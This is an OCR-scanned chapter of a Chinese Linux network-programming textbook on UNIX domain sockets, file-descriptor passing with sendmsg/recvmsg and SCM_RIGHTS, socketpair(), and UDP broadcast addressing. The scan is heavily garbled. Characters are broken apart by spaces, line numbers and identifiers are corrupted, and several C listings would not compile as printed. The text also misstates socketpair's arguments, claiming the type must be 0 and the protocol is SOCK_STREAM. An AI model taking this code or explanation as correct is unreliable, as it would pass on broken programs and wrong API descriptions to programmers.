返回 一 个 ECONNREFUSED 错误 。 这 和 TCP 有 所 不 同 : 如 果 监 听 套 接 字 的 队列 已 

满 ， 它 将 忽略 到 来 的 SYN，TCP 连接 的 发 起 方 会 接着 发 送 几 次 SYN 重 试 。 

UNIX 域 数据 报 套 接 字 和 UDP 套 接 字 类 似 : 它们 都 提供 一 个 保留 记录 边界 的 不 可 

靠 的 数据 服务 。 

与 UDP 套 接 字 不 同 的 是 ,在 未 绑 定 的 UNIX 域 套 接 字 上 发 送 数 据 报 不 会 给 它 捆绑 
-个 路 径 名 。 这 意味 着 ， 数 据 报 发 送 者 除非 绑 定 一 个 路 径 名 ， 否 则 接收 者 无 法 发 

应 答 数 据 报 。 同 样 ， 与 TCP 和 UDP 不 同 的 是 ， 给 UNIX 域 数据 报 套 接 字 调 用 

connect() 不 会 捆绑 一 个 路 径 名 。 


加 


11.1.3 ”使 用 UNIX 域 函 数 进行 套 接 字 编 程 
使 用 UNIX 域 函数 进行 套 接 字 编 程 与 AF_INET 的 方式 一 致 ， 不 同 的 地 方 在 于 地 址 结 


构 不 同 。 


01 
02 
03 
04 
05 
06 
07 
08 
09 
10 
下 
12 


下 面 是 一 个 地 址 UNIX 域 套 接 字 编程 的 例子 。 


#include <sys/types.h> 
#include <sys/socket.h> 
#include <sys/un.h> 
#include <string.h> 
#include <signal.h> 
#include <stdlib.h> 
#include <stdio.h> 
#include <errno.h> 
#include <unistd.h> 


Wi 
* 错 误 处 理 函 数 
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于 3 

14 static void display err(const char*on what) 

ES 

16 perror (on what); 

17 exit (1); 

18” } 

19 

20 int main(int argc,char*argv[]) 

2 

2 int error; /* 错 误 值 */ 
2 int sock UNIX; /*socket*/ 
24 struct sockaddr un addr UNIX; /*AF_UNIX 族 地 址 */ 
25 int len UNIX; /*AF_UNIX 族 地 址 长 度 */ 
26 const char path[] = "/demon/path"; /* 路 径 名 */ 
27 

28 

29 * 建 立 套 接 字 

30 a 

31 sock UNIX = socket (AF UNIX,SOCK STREAM,0); 

32 

33 if(sock UNIX == -1) 

34 display err("socket()"); 

35 

36 Ws 


5 * 由 于 之 前 已 经 使 用 了 path 路 径 用 于 其 他 用 途 
38 * 需 要 将 之 前 的 绑 定 取消 
ad 


39 

40 unlink (path); 

41 

42 

43 * 填 充 地 址 结构 

44 区 

45 memset (&addr UNIX,0,sizeof (addr UNIX)); 
46 

47 addr_UNIX.sun family = AF_LOCAL; 

48 strcpy (addr UNIX.sun path,path); 

49 len_ UNIX = sizeof(struct sockaddr un); 
50 

51 Ph 

52 * 绑 定 地 址 到 socket sock_UNIX 

53 a 

54 error = bind(sock UNIX, 

55 (struct sockaddr*) gaddr UNIX, 
56 len UNIX); 

57 if(error == -1) 

58 display err("bind()"); 

39 

60 Ve 

61 * 关 闭 socket 

62 大 大 

63 close(sock UNIX); 

64 unlink (path); 

65 

66 return 0; 

"| 


上 面 的 这 个 例子 的 执行 步骤 如 下 : 
口 第 23 行 定义 了 整 型 的 变量 sock_UNIX， 用 来 存放 创建 的 套 接 字 文 件 描述 符 。 
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口 第 24 行 定义 了 sockaddr un 类 型 的 地 址 结构 并 且 命 名 为 addr_ UNIX。 后 面 的 程序 
中 将 会 使 用 类 型 AF_LOCAL 套 接口 地 址 来 处 理 这 个 结构 。 

口 第 26 行 定义 了 路 径 名 ， 这 个 路 径 名 用 于 绑 定 socket 的 时 候 使 用 。 

口 第 31 行 建立 一 个 UNIX 类 型 的 socket， 在 33 行进 行 错 误 类 型 检测 。 

口 第 40 行 调用 unlinkO 函 数 。 因 为 AF_UNIX 地 址 会 创建 一 个 文件 系统 对 象 , 如 果 不 

再 需要 必须 删除 。 如 果 这 个 程序 最 后 一 次 运行 时 没有 删除 ， 这 条 语句 会 试 着 进行 

删除 。 

第 45 行将 adrr_UNIX 的 地 址 结构 清 零 。 

第 47 行将 地 址 族 初始 化 为 AF_UNIX。 

第 48 行 向 地 址 结构 中 复制 路 径 名 "/demon/path"。 

第 49 行 计算 地 址 的 长 度 。 

第 54 行 调用 bindO) 函 数 ， 将 格式 化 的 地 址 赋值 给 第 23 行 创建 的 套 接口 。 

第 63 行 关闭 套 接 口 。 

第 64 行 调用 bind() 函 数 时 删除 为 套 接口 所 创建 的 UNIX 路 径 名 。 

上 面 的 例子 中 ， 需 要 首先 建立 一 个 路 径 名 为 demon/path" 的 目录 ， 如 果 需 要 建立 一 个 
临时 使 用 的 套 接 字 ， 而 又 不 方便 手动 建立 ， 可 以 使 用 Linux 中 的 一 个 特殊 方法 ， 即 格式 化 
抽象 本 地 地 址 。 

格式 化 抽象 本 地 地 址 的 方式 需要 将 路 径 名 的 第 一 个 字符 设置 为 空 字符 , 即 “\0”。 例如 ， 
对 于 上 面 的 例子 ， 可 以 在 第 50 行 插入 如 下 代码 : 
50 addr_UNIX.sun path[0] = 0; 


DOOOODODO 


这 时 在 第 48 行 时 ， 结 构 addr_UNIX 的 成 员 sun_path 的 内 容 如 表 11.1 所 示 。 


表 11.1 49 行 时 sun_path 的 内 容 


第 50 行 对 sun_path 的 内 容 进 行 了 修改 , 进行 bind 的 时 候 , 其 路 径 名 已 经 发 生 了 变化 ， 
其 实 是 对 字符 串 "demon/path" 进 行 了 绑 定 ， 在 第 54 行 时 sun_path 的 内 容 如 表 11.2 所 示 。 


表 11.2 54 行 时 sun_path 的 内 容 


内 容 
计算 UNIX 域 结构 的 长 度 使 用 sizeofO) 函 数 ， 其 实 可 以 使 用 SUN_LEN 宏 来 结算 , 例如 
第 49 行 可 以 修改 为 如 下 方式 : 
49 len UNIX = SUN_LEN (addr un); 
11.1.4 ”传递 文件 描述 符 
在 进程 之 间 经 常 遇 到 需要 在 各 进程 之 间 传 递 文件 描述 符 的 情况 ， 例 如 有 一 种 设备 它 在 
加 电 期 间 只 能 打开 一 次 , 如 果 关 闭 后 再 次 打开 就 会 发 生 错误 。 这 时 就 需要 有 一 个 调度 程序 ， 
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它 调 度 多 个 相同 设备 ， 当 有 客户 端 需要 此 类 型 的 设备 时 会 向 它 发 送 一 个 请 求 ， 服 务 器 会 把 
某 个 设备 的 描述 符 给 客户 端 。 但 是 ， 由 于 不 同 进程 之 间 的 文件 描述 符 所 表示 的 对 象 是 不 同 
的 ， 这 需要 一 种 特殊 的 机 制 来 实现 上 述 的 要 求 。 

Linux 系统 中 提供 了 一 种 特殊 的 方法 ， 可 以 从 一 个 进程 中 将 一 个 已 经 打开 的 文件 描述 
符 传递 给 其 他 的 任何 进程 。 其 基本 过 程 如 下 所 述 。 

(1) 创建 一 个 字 节 流 或 者 数据 报 的 UNIX 域 套 接 字 。 

口 如 果 目 标 是 fork() 一 个 子 进程 ， 让 子 进程 打开 描述 符 并 将 它 返 回 给 父 进程 ,那么 父 

进程 可 以 用 socketpair0) 创 建 一 个 流 管道 ， 用 它 来 传递 描述 字 。 

口 如 果 进 程 之 间 没 有 亲缘 关系 ， 那 么 服务 器 必须 创建 一 个 UNIX 域 字 节 流 套 接 字 ， 

绑 定 一 个 路 径 名 ， 让 客户 连接 到 这 个 套 接 字 。 然 后 客户 端 可 以 向 服务 器 发 送 一 个 
请 求 以 打开 某 个 描述 字 ， 服 务 器 将 描述 符 通过 UNIX 域 套 接 字 传 回 。 在 客户 端 和 
服务 器 之 间 也 可 以 使 用 UNIX 数据 报 套 接 字 ， 但 这 样 做 没有 什么 好 处 ， 而 且 数 据 
报 存在 丢失 的 可 能 性 。 

(2) 进程 可 以 用 任何 返回 描述 符 的 UNIX 函数 打开 , 例如 函数 open()、pipe()、mkfifo()、 
socket() 或 者 accept()。 可 以 在 进程 间 传 递 任何 类 型 的 描述 符 。 

(3) 发 送 进程 建立 一 个 msghdr 结构 ， 其 中 包含 要 传递 的 描述 符 。 在 POSIX 中 说 明 该 
描述 符 作为 辅助 数据 发 送 ， 但 老 的 实现 使 用 msg_accright 成 员 。 发 送 进程 调用 sendmsg() 
通过 第 一 步 得 到 的 UNIX 域 套 接 字 发 出 套 接 字 。 这 时 这 个 描述 符 是 在 飞行 中 的 。 即 在 发 送 
进程 调用 sendmsg() 之 后 、 在 接受 进程 调用 recvmsg() 之 前 将 描述 符 关 闭 ， 它 仍 会 为 接收 进 
程 保持 打开 状态 。 描 述 符 的 发 送 导 致 它 的 访问 统计 数 加 1。 

(4) 接收 进程 调用 recvmsg() 在 UNIX 域 套 接 字 上 接收 套 接 字 。 通常 接收 进程 收 到 的 描 
述 符 的 编号 和 发 送 进程 中 的 描述 符 的 编号 不 同 ， 但 这 没有 问题 。 传 递 描述 符 不 是 传递 描述 
符 的 编号 ， 而 是 在 接收 进程 中 建立 一 个 新 的 描述 符 ， 指 向 内 核 的 文件 表 中 与 发 送 进程 发 送 
的 描述 符 相 同 的 项 。 


11.1.5 socketpair() 函 数 


socketpair() 函 数 建立 一 对 匿名 的 已 经 连接 的 套 接 字 ， 其 特性 由 协议 族 d、 类 型 type、 
协议 protocol 决定 ， 建 立 的 两 个 套 接 字 描述 符 会 放 在 sv[0] 和 sv[1] 中 。 

socketpair() 函 数 的 原型 如 下 ， 第 1 个 参数 d， 表 示 协 议 族 ， 只 能 为 AF_LOCAL 或 者 
AF_UNIX; 第 2 个 参数 type， 表 示 类 型 ， 只 能 为 0。 第 3 个 参数 protocol， 表 示 协 议 ， 可 
以 是 SOCK _ STREAM 或 者 SOCK DGRAM。 用 SOCK _ STREAM 建立 的 套 接 字 对 是 管道 
流 , 与 一 般 的 管道 相 区 别 的 是 , 套 接 字 对 建立 的 通道 是 双向 的 ， 即 每 一 端 都 可 以 进行 读 写 。 
参数 sv， 用 于 保存 建立 的 套 接 字 对 。 

#include <sys/types.h> 

#include <sys/socket.h> 

int socketpair (int d, int type, int protocol, int sv[2]); 

socketpair() 函 数 的 返回 值 为 0 时 表示 调用 成 功 ， 为 -1 时 表示 发 生 了 错误 ， 错 误 值 在 变 
量 errno 中 ，errno 的 含义 如 表 11.3 所 示 。 
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表 11.3 socketpair() 函 数 errno 的 值 及 含义 


值 含义 
EAFNOSUPPORT 指定 的 地 址 族 本 机 不 支持 
EFAULT 参数 sv 所 指 不 是 本 进程 的 合法 地 址 
EMFILE 本 进程 使 用 了 过 多 的 描述 符 
ENFILE 系统 的 文件 打开 总 数量 已 经 达到 
EOPNOTSUPP 所 指定 的 协议 不 能 用 于 建立 套 接 字 对 
EPROTONOSUPPORT 所 指定 的 协议 本 机 不 支持 


socketpair() 函 数 建立 两 个 套 接 字 文件 描述 符 sv[0] 和 sv[1]， 如 图 11.1 所 示 。 
socketpair() 函 数 建立 的 描述 符 可 以 使 用 类 似 管道 的 处 理 方法 在 两 个 进程 之 间 通 信 。 使 
用 函数 socketpair() 建 立 套 接 字 描 述 符 后 ， 在 一 个 进程 中 关闭 其 中 的 一 个 ， 在 另 一 个 进程 中 


关闭 另 


-个 ， 如 图 11.2 所 示 。 调 用 函数 socketpair0 后 ，fork 进程 在 进程 A 中 关闭 sv[0]， 


在 进程 B 中 关闭 sv[1]， 则 会 形成 图 中 所 示 的 状况 。 


图 11.1 


进程 A 进程 B 


[1 0 [0 


| | [| | 


socketpair() 建 立 套 接 图 11.2 ”使 用 fork 和 socketpair(0) 建 立 进程 间 socket 的 状况 


字 文件 描述 符 


11.1.6 ”传递 文件 描述 符 的 例子 


本 节 中 将 使 用 
中 打开 一 个 文件 描述 符 ， 通 过 消息 传送 的 方式 将 文件 描述 符 传递 给 进程 B。 


1. 进程 A 的 代码 


进程 A 根据 用 户 输入 的 文件 名 打开 一 个 文件 ， 将 文件 描述 符 打包 到 消息 结构 中 ， 然后 
发 送 给 进程 B。 


01 
02 
03 
04 
05 
06 
07 


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


-个 实例 来 介绍 进程 间 传递 文件 描述 符 的 例子 。 分 为 两 个 进程 ， 进 程 A 


<sys/types.h> 
<sys/socket.h> 
<sys/un.h> 
<string.h> 
<signal.h> 
<stdio.h> 
<stdlib.h> 
<errno.h> 
<unistd.h> 
<fcnt1 .h> 


ssize t send fd(int fd, void*data, size t bytes, int sendfd) 


{ 


struct msghdr msghdr send; /* 发 送 消 息 */ 


sg 
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15 struct iovec iov[1]; /* 向 量 */ 

16 /* 方 便 操作 msg 的 结构 */ 

ky union{ 

18 struct cmsghdr cm; /*control msg 结构 */ 

19 char control [CMSG SPACE (sizeof (int))]; 

20 /* 字 符 指针 ,方便 控制 */ 

之 下 }control un; 

22 struct cmsghdr*pcmsghdr=NULL; /* 控 制 头 部 的 指针 */ 

23 msghdr_send.msg_control = control un.control; /* 控 制 消息 */ 

24 msghdr_send.msg_controllen = sizeof (control un.control); 

25 /* 长 度 */ 

26 

2 Pcmsghdr = CMSG FIRSTHDR(&msghdr send); /* 取 得 第 一 个 消息 头 */ 

28 Pcmsghdr->cmsg_len = CMSG LEN (sizeof (int)); /* 获 得 长 度 */ 

29 pcmsghdr->cmsg_level = SOL SOCKET; /* 用 于 控制 消息 */ 

30 pecmsghdr->cmsg_type = SCM RIGHTS; 

31 *((int*)CMSG DATA (pcmsghdr))= sendfd; /*socket 值 */ 

32 

33 

34 msghdr send.msg name = NULL; /* 名 称 */ 

35 msghdr_ send.msg namelen = 0; /* 名 称 长 度 */ 

36 

3 iov[0] .iov base = data; /* 向 量 指针 */ 

38 iov[0] .iov len = bytes; /* 数 据 长 度 */ 

39 msghdr send.msg iov = iov; /* 填 充 消息 */ 

40 msghdr_send.msg iovlen = 1; 

41 

42 return (sendmsg(fd, gmsghdr send, 0)); /* 发 送 消息 */ 

43 } 

44 

45 int main(int argc, char*argv[]) 

46 { 

47 int fd; 

48 ssize 七 n; 

49 加 

50 if(argc != 4) 

5 printf ("socketpair error\n"); 

5 if((fd = open(argv[2],atoi(argv[3])))<0) ”/* 打 开 输 入 的 文件 名 称 */ 

53 return 0; 

54 

55 if((n =send fd(atoi(argv[1]),"",1,fqd))<0) /* 发 送 文 件 描述 符 */ 

56 return 0; 

3n return 0; 

58 } 

分 为 如 下 步 又 : 

口 第 12 一 43 行为 函数 send_fd()， 它 向 文件 描述 符 得 发 送 消 息 ， 将 sendfd 打包 到 消 
息 体 中 。 


口 第 14 行 建立 一 个 消息 ， 之 后 填充 此 消息 的 成 员 数 据 ， 并 发 送 给 得 。 

口 第 15 行为 向 量 ， 消息 的 数据 在 此 项 两 种 保存 。 

口 第 17~21 行 建立 一 个 联合 结构 ， 便 于 进行 消息 的 处 理 。 

口 第 23 行 填充 消息 的 控制 部 分 ， 第 24 行为 控制 部 分 的 长 度 。 

口 第 27 行 取得 消息 的 第 一 个 头 部 。 

第 28 行为 长 度 ， 由 于 发 送 的 是 一 个 文件 描述 符 ， 所 以 长 度 为 一 个 int 类 型 的 长 度 。 


口 


a 


符 
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口 第 29 行 设 置 消 息 的 level 为 SOL SOCKET， 第 30 行 填 充 消息 的 类 型 为 
SCM_RIGHTS。 

口 第 34 行 和 第 35 行 用 于 将 消息 的 名 称 和 长 度 置 空 。 

口 第 37 行 和 第 38 行将 传 入 的 数据 和 长 度 传递 给 向 量 成 员 。 

口 第 39 行将 向 量 填充 给 消息 ， 第 40 行 设置 向 量 的 个 数 。 

口 第 42 行将 消息 发 送 给 fd。 

口 第 45 一 58 行为 main0 函 数 ， 用 于 将 打开 的 文件 描述 符 传递 给 输入 的 socket。 

口 第 52 行 打开 传 入 路 径 的 文件 。 

口 第 55 行将 打开 的 文件 传递 给 输入 的 某 个 套 接 字 文 件 描述 符 。 


2. 进程 B 的 代码 


进程 B 获得 进程 A 中 发 送 过 来 的 消息 , 并 从 中 取得 文件 描述 符 。 根 据 获 得 的 文件 描述 
直接 从 文件 中 读 取 数据 ， 并 将 数据 在 标准 输出 中 打印 出 来 。 


01 #include <sys/types.h> 

02 #include <sys/socket.h> 

03 #include <sys/un.h> 

04 #include <string.h> 

05 #include <signal.h> 

06 #include <stdio.h> 

07 #include <fcntl.h> 

08 #include <errno.h> 

09 #include <unistd.h> 

10 #include <sys/types.h> 

11 #include <sys/wait.h> 

二 2 

se 

14 * ”从 fa 中 接收 消息 ,并 将 文件 描述 符 放 在 指针 recvfda 中 
Er 

16 ssize t recv fdl(int fd, void*data, size t bytes, int*recvfd) 
he 


18 struct msghdr msghdr recv; /* 接 收 消息 接收 */ 
19 struct iovec iov[1]; /* 接 收 数据 的 向 量 */ 
20 size t n; 

2 

22 union{ 

23 struct cmsghdr cm; 

24 char control [CMSG SPACE (sizeof (int))]; 

2 }control un; 

26 struct cmsghdr*pcmsghdr; /* 消 息 头 部 */ 
27 msghdr_recv.msg_control = control un.control; /* 控 制 消息 */ 
28 msghdr_recv.msg_controllen = sizeof(control un.control); 
29 /* 控 制 消息 的 长 度 */ 

30 

31 msghdr recv.msg name = NULL; /* 消 息 的 名 称 为 空 */ 

32 msghdr_ recv.msg namelen = 0; /* 消 息 的 长 度 为 空 */ 

3 

34 iov[0] .iov base = data; /* 向 量 的 数据 为 传 入 的 数据 */ 
35 iov[0] .iov len = bytes; /* 向 量 的 长 度 为 传 入 数据 的 长 度 */ 
36 msghdr recv.msg iov = iov; /* 消 息 向 量 指针 */ 

EX msghdr recv.msg iovlen = 1; /* 消 息 向 量 的 个 数 为 1 个 */ 
38 if((n = recvmsg(fd，&msghdr recv，0) )<=0) /* 接 收 消息 */ 
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39 return n; 
40 
41 if((pcmsghdr = CMSG FIRSTHDR(&msghdr recv))!= NULL && 
42 /* 获 得 消息 的 头 部 */ 
43 pcmsghdr->cmsg len == CMSG LEN (sizeof (int))){ 
和 /* 获 得 消息 的 长 度 为 int*/ 
45 if(pcmsghdr->cmsg level != SOL SOCKET) 
/* 消 息 的 level 应 该 为 SOL_SOCKET*/ 
46 printf("control level != SOL SOCKET\n"); 
47 
48 if(pcmsghdr->cmsg_type != SCM RIGHTS) /* 消 息 的 类 型 判断 */ 
49 printf("control type != SCM RIGHTS\n"); 
50 
al *recvfd =*((int*)CMSG DATA (pcmsghdr)); 
52 /* 获 得 打开 文件 的 描述 符 */ 
S53 }else 
54 *recvfd = -1; 
55 
56 return n; /* 返 回 接收 消息 的 长 度 */ 
57 于 
58 
59 int my_open (const char*pathname, int mode) 
G60 下 
61 int fd, sockfd[2],status; 
62 pid t childpid; 
63 char c, argsockfd[10],argmode[10]; 
64 
65 socketpair (AF_LOCAL,SOCK STREAM,0,sockfd); /* 建 立 socket*/ 
66 if((childpid = fork())==0){ /* 子 进程 */ 
67 close(sockfd[0]); /* 关 闭 sockfd[0]*/ 
68 snprintf (argsockfd, sizeof (argsockfd),"%d",sockfd[1]); 
/*socket 描述 符 */ 
69 snprintf (argmode, sizeof (argmode),"%d",mode); 
/* 打 开 文件 的 方式 */ 
70 execl("./openfile","openfile",argsockfd,pathname,argmode, 
(char*) NULL); /* 执 行进 程 A*/ 
于 printf ("execl error\n"); 
72 } 
73 /* 父 进程 */ 
74 close (sockfd[1]); 
75 /* 等 待 子 进程 结束 */ 
76 waitpid(childpid, &status,0); 
2 
78 if (WIFEXITED (status)==0) /* 判 断 子 进程 是 否 结束 */ 
79 printf ("child did not terminate\n") ; 
80 if((status = WEXITSTATUS (status) )==0) { /* 子 进程 结束 */ 
81 recv fd(sockfd[0],&c,1, gfd); /* 接 收 进程 A 打开 的 文件 描述 符 */ 
82 }elsef 
83 errno = status; 
84 0 
85 3 
86 
87 close (sockfd[0]); /* 关 闭 sockfd[0]*/ 
88 return fd; /* 返 回 进程 A 打开 文件 的 描述 符 */ 
89 
SO 
91 
92 #define BUFFSIZE 256 /* 接 收 的 缓冲 区 大 小 */ 
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int main(int argc, char*argv[]) 
{ 
dant Ed ns 


char buff[BUFFSIZE]; /* 接 收 缓冲 区 */ 


if(argc !=2) 
printf ("error argc\n"); 
if((fd = my_open(argv[1]，O_RDONLY) )<0) 
/* 获 得 进程 A 打开 的 文件 描述 符 */ 


printf("can't open %s\n",argv[1]); 


while((n = read(fd, buff, BUFFSIZE))>0) /* 读 取 数 据 */ 
write (1,buff,n); /* 写 入 标准 输出 */ 


return(0); 


分 为 如 下 的 步 又 : 


口 


OoOoOooOoOoOoOoOoOoOooOooOoOoOoOoOooOoOoOoOOoOOODO DO 


第 16 一 58 行为 函数 recv_fd(), 它 从 乌 接 收 消息 ， 并 返回 获得 消息 中 的 信息 ， 即 打 
开 文 件 的 描述 符 。 

第 18 行 建立 一 个 消息 ， 之 后 填充 此 消息 的 成 员 数据 ， 并 发 送 给 fd。 

第 19 行为 向 量 ， 消 息 的 数据 在 此 项 中 保存 。 

第 22 一 25 行 建立 一 个 联合 结构 ， 便 于 进行 消息 的 处 理 。 

第 27 行 填充 消息 的 控制 部 分 ， 第 28 行为 控制 部 分 的 长 度 。 

第 31 行 和 第 32 行 用 于 将 消息 的 名 称 置 空 。 

第 34 行 和 第 35 行将 传 入 的 数据 和 长 度 传递 给 向 量 成 员 。 

第 36 行将 向 量 填充 给 消息 ， 第 37 行 设置 向 量 的 个 数 。 

第 38 行 接收 消息 。 

第 41 行 取 得 消息 的 第 一 个 头 部 。 

第 43 行 判 断 消息 长 度 是 否 为 int 长 度 。 

第 45 行 判断 消息 level 是 否 为 SOL_ SOCKET。 

第 49 行 判 断 消息 的 类 型 是 否 为 SCM_RIGHTS 。 

第 52 行 获得 传 入 的 文件 描述 符 。 

第 60 一 92 行为 my_open() 函 数 ， 按 照 传 入 的 路 径 和 模式 打开 文件 。 

第 66 行 调用 socketpair0 函 数 获得 socket 对 。 

第 67 行为 fork() 进 程 

第 72 行 在 子 进程 中 调用 外 部 进程 打开 文件 。 

第 76 一 87 行为 父 进程 处 理 过 程 。 等 待 子 进程 处 理 函 数 的 结束 , 并 接收 传 过 来 的 值 。 
第 95 一 111 行为 主 函 数 。 它 调用 my_open() 获 得 进程 A 传 入 的 文件 描述 符 , 从 文件 
中 读 取 数据 并 显示 到 标准 输出 。 


11:2 播 


前 面 介绍 的 TCP/P 知识 都 是 基于 单 播 ， 即 一 对 一 的 方式 ， 本 节 介绍 一 对 多 的 广播 方 
式 。 广 播 是 由 一 个 主机 发 向 一 个 网 络 上 所 有 主机 的 操作 方式 。 例 如 ， 在 一 个 局 域 网 内 进行 
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广播 ， 同 一 子 网 内 的 所 有 主机 都 可 以 收 到 此 广播 发 送 的 数据 。 
11.2.1 广播 的 IP 地 址 


要 使 用 广播 ， 需 要 了 解 IPv4 特定 的 广播 地 址 。IP 地 址 分 为 左边 的 网 络 ID 部 分 ， 以 及 
右边 的 主机 ID 部 分 。 广 播 地 址 所 用 的 IP 地址 将 表示 主机 ID 的 位 全 部 设置 为 1。 网 卡 正 确 
配置 以 后 ， 可 以 用 下 面 的 命令 来 显示 所 选用 接口 的 广播 地 址 。 


$ ifconfig eth0 
eth0 Link encap: 以 太 网 硬件 地 址 00:0c:29:1f:00:35 
inet 地 址 :192.168.83.186 广播 :192.168.83.255 掩 码 :255.255.255.0 
inet6 地 址 : fe80::20c:29ff:felf:35/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 跃 点 数 :1 
接收 数据 包 :10963 错误 :0 丢弃 :0 过 载 :0 帧 数 :0 
发 送 数据 包 :1887 错误 :0 丢弃 :0 过 载 :0 载波 :0 
碰撞 :0 发 送 队列 长 度 :1000 
接收 字 节 :1536994 (1.5 MB) 发 送 字 节 :186347 (186.3 KB) 
中 断 :19 基本 地 址 :0x2000 


第 二 行 输出 信息 说 明 eth0 网 络 接口 的 广播 地 址 为 192.168.83.255。 这 个 广播 IP 地 址 的 
前 3 个 字 节 为 网 络 ID， 即 192.168.83。 这 个 地 址 的 主机 ID 部 分 为 255, 值 255 是 表示 主机 
ID 全 为 1 的 十 进 制 数 。 

广播 地 址 255.255.255.255 是 一 种 特殊 的 广播 地 址 , 这 种 格式 的 广播 地 址 是 向 全 世界 进 
行 广播 ， 但 是 却 有 更 多 的 限制 。 一 般 情况 下 ， 这 种 广播 类 型 不 会 被 路 由 器 路 由 ， 而 一 个 更 
为 特殊 的 广播 地 址 ， 例 如 192.168.0.255 也 许 会 被 路 由 ， 这 取决 于 路 由 器 的 配置 。 

通用 的 广播 地 址 在 不 同 的 环境 中 的 含义 不 同 。 例 如 ，IP 地 址 255.255.255.255， 一 些 
UNIX 系统 将 其 解释 为 在 主机 的 所 有 网 络 接口 上 进行 广播 ， 而 有 的 UNIX 内 核 只 会 选择 其 
中 的 一 个 接口 进行 广播 。 当 一 个 主机 有 多 个 网 卡 时 ， 这 就 会 成 为 一 个 问题 。 

如 果 必 须 向 每 个 网 络 接口 广播 ， 程 序 在 广播 之 前 应 执行 下 面 的 步骤 。 

(1) 确定 下 一 个 或 第 一 个 接口 名 字 。 

(2) 确定 接口 的 广播 地 址 。 

(3) 使 用 这 个 广播 地 址 进行 广播 。 

(4) 对 于 系统 中 其 余 的 活动 网 络 接口 重复 执行 步骤 (1) 一 步骤 (3)。 

在 执行 完 这 些 步 骤 以 后 ， 就 可 以 认为 已 经 对 每 一 个 接口 进行 广播 。 
11.2.2 ”广播 与 单 播 的 比较 

广播 和 单 播 的 处 理 过 程 是 不 同 的 ， 单 播 的 数据 只 是 收发 数据 的 特定 主机 进行 处 理 ， 而 
广播 的 数据 是 整个 局 域 网 都 进行 处 理 。 

例如 ， 在 一 个 以 太 网 上 有 3 个 主机 ， 主 机 的 配置 如 表 11.4 所 示 。 

表 11.4 某 局 域 网 中 主机 的 配置 情况 


主 机 A B C 
卫 地 址 192.168.1.150 192.168.1.151 192.168.1.158 


MAC 地 址 00:00:00:00:00:01 00:00:00:00:00:02 00:00:00:00:00:03 


-es 
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单 播 的 示意 图 如 图 11.3 所 示 ， 主 机 A 向 主机 B 发 送 UDP 数据 报 ， 发 送 的 目的 外 为 
192.168.1.151， 端 口 为 80， 目 的 MAC 地 址 为 00:00:00:00:00:02。 此 数据 经 过 UDP 层 、IP 
层 ， 到 达 数 据 链 路 层 ， 数 据 在 整个 以 太 网 上 传播 ， 在 此 层 中 其 他 主机 会 判断 目的 MAC 地 
址 。 主机 C 的 MAC 地 址 为 00:00:00:00:00:03, 与 目的 MAC 地 址 00:00:00:00:00:02 不 匹配 ， 
数据 链 路 层 不 会 进行 处 理 ， 直 接 丢 弃 此 数据 。 


' ' ' 
| 主机 A | 主机 C | 主机 B 
一 一 一 一 一 
1IP: 192.168.1.150 ‘IP:192.168.1.158 ! IP: 192.168.1.151 
发 送 数据 应 用 程序 接收 程序 
下 
1 === 
UDP UDP UDP 
目的 IP 地 址 : 192.168.1.151 I 
1 目的 端口 : 80 
IP Pp TP 
四 人 
| 目的 MAC 地 址 不 匹配 Bo 
数据 链 路 层 数据 链 路 层 数据 链 路 层 
| 一 一 一 一 
去 1 一 
以 太 网 


以 太 网 头 部 | 。 IP 头 部 | uppx 部 upp 数据 | 


目的 MAC 地 址 : 
00:00:00:00:00:02 目的 端口 : 80 


目的 IP 地 址 : 192.168.1.151 


图 11.3 单 播 的 以 太 网 示意 图 


主机 B 的 MAC 地 址 为 00:00:00:00:00:02， 与 目的 MAC 地 址 00:00:00:00:00:02 一 致 ， 
此 数据 会 经 过 IP 层 、UDP 层 ， 到 达 接 收 数据 的 应 用 程序 。 

广播 的 示意 图 如 图 11.4 所 示 ， 主 机 A 向 整个 网 络 发 送 广播 数据 ， 发 送 的 目的 卫 为 
192.168.1.255， 端 口 为 80， 目 的 MAC 地 址 为 FF:FF:FF:FF:FF:FF。 此 数据 经 过 UDP 层 、IP 
层 ， 到 达 数 据 链 路 层 ， 数 据 在 整个 以 太 网 上 传播 ， 在 此 层 中 其 他 主机 会 判断 目的 MAC 地 
址 。 由 于 目的 MAC 地 址 为 FF:FF:FF:FF:FF:FF， 主 机 C 和 主机 B 会 忽略 MAC 地 址 的 比较 
(当然 ， 如 果 协 议 栈 不 支持 广播 ， 则 仍然 比较 MAC 地 址 )， 处 理 接收 到 的 数据 。 

主机 B 和 主机 C 的 处 理 过 程 一 致 ， 此 数据 会 经 过 人 P 层 、UDP 层 ， 到 达 接 收 数据 的 应 
用 程序 。 


11.2.3 ”广播 的 示例 


本 节 中 是 一 个 服务 器 地 址 发 现 的 代码 ， 假 设 服务 器 为 A， 客户 端 为 B。 客 户 端 在 某 个 
局 域 网 启动 的 时 候 ， 不 知道 本 局 域 网 内 是 否 有 适合 的 服务 器 存在 ， 它 会 使 用 广播 在 本 局 域 


1 


第 2 篇 Linux 用 户 层 网 络 编程 


主机 A ! 主机 C ! 主机 B 
一 | 一 一 一 一 一- 一 
‘IP: 192.168.1.150 IP:192.168.1.158 IP:192.168.1.151 
发 送 数据 应 用 程序 接收 程序 
UDP UDP UDP 
目的 IP 地 址 :192.168.1.255 1 | 
1 目的 端口 : 80 
TIP TIP IP 
下 ET 
目的 MAC 地 址 匹配 EP 
1 [ 址 匹配 
数据 链 路 层 数据 链 路 层 数据 链 路 层 
f f 
1 
了 天 网 
以 大 网 头 部 | 外头 部 | UDP 类 部 | UpP 数 所 


目的 MAC 地 址 : 
FF:FF:FF:FF:FF:FF 


日 的 端口 : 80 
目的 中 地 址 : 192.168.1.255 

图 11.4 广播 的 以 太 网 示意 图 
网 内 发 送 特定 协议 的 请 求 , 如 果 有 服务 器 响应 了 这 种 请 求 ， 则 使 用 响应 请 求 的 卫 地 址 进行 
连接 ， 这 是 一 种 服务 器 /客户 端 自动 发 现 的 常用 方法 。 

1. 广播 例子 简介 

如 图 11.5 所 示 为 使 用 广播 的 方法 发 现 局 域 网 上 服务 器 的 IP 地 址 。 服 务 器 在 局 域 网 上 
侦 听 ， 当 有 数据 到 来 的 时 候 ,， 判断 数据 是 否 有 关键 字 IP_FOUND， 当 存在 此 关键 字 的 时 候 ， 
发 送 IP_FOUND_ACK 到 客户 端 。 客户 端 判 断 是 否 有 服务 器 的 响应 IP_FOUND 请 求 ， 并 判 
